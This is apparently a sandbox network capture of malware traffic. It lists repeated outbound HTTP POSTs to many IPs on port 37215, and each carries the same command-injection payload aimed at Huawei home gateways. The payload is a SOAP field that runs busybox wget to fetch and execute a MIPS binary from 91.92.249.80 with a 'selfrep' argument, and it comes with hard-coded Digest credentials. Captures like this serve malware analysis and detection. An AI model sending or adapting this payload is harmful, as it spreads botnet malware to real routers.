                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1413192.168.2.235339441.189.115.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471184015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1414192.168.2.234908241.149.137.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.471282959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1415192.168.2.2338776157.211.167.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472074986 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1416192.168.2.234733441.209.177.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472095013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1417192.168.2.2357558197.164.115.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472100019 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1418192.168.2.2357354152.163.109.23637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472229958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1419192.168.2.2354484189.26.13.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472299099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1420192.168.2.2340472197.133.151.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472309113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1421192.168.2.233595041.27.49.9937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472311974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1422192.168.2.2358264157.255.95.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472311974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
